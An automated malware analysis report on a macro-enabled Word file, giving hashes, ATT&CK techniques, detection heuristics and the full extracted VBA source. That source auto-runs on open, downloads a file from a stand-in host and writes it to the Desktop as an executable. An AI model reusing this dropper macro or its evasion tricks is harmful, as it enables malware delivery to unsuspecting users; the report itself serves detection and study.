Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7aebbf2226aad0e2…

MALICIOUS

Office (OOXML)

19.3 KB Created: 2016-11-08 09:44:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2017-02-27
MD5: 8d87595788305d26e2a3eda4c287be20 SHA-1: 919d39f17a9450eef1adadb1b3296a842c6ce16b SHA-256: 7aebbf2226aad0e28f3ccc315a31230a8b37025cd20d35440563d3fde4b58cf2
218 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. The document body contains a lure to enable macros, claiming the message is encrypted. The Document_Open macro uses CreateObject to download a file from 'http://example.com/' and saves it as 'C:\Users\<user>\Desktop\am_i_malicious.exe', which is then likely executed. This behavior is consistent with a macro-based dropper.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-1854417 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1854417
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        oStream.Write WinHttpReq.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    DesktopPath = Environ("UserProfile") & "\Desktop\am_i_malicious.ex" + "e"
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
    • http://example.com/Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 973 bytes
SHA-256: 552fd442c2e100524e22ba3cecd578d182e55eca106ad17fa005a9a1edae22e1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_New()

End Sub

Private Sub Document_Open()

Dim myURL As String
myURL = "http://example.com/"

Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", myURL, False, "username", "password"
WinHttpReq.send

DesktopPath = Environ("UserProfile") & "\Desktop\am_i_malicious.ex" + "e"

If WinHttpReq.Status = 200 Then
    Set oStream = CreateObject("ADODB.Stream")
    oStream.Open
    oStream.Type = 1
    oStream.Write WinHttpReq.responseBody
    oStream.SaveToFile DesktopPath, 2 ' 1 = no overwrite, 2 = overwrite
    oStream.Close
    MsgBox "oops, wrote file to:" + DesktopPath
End If


End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 13824 bytes
SHA-256: d2d25cc31efdd78a27ff1361845611597c829188f87f65ad6958d36366018d5e

Open this report in the interactive analyzer, or submit your own file for analysis.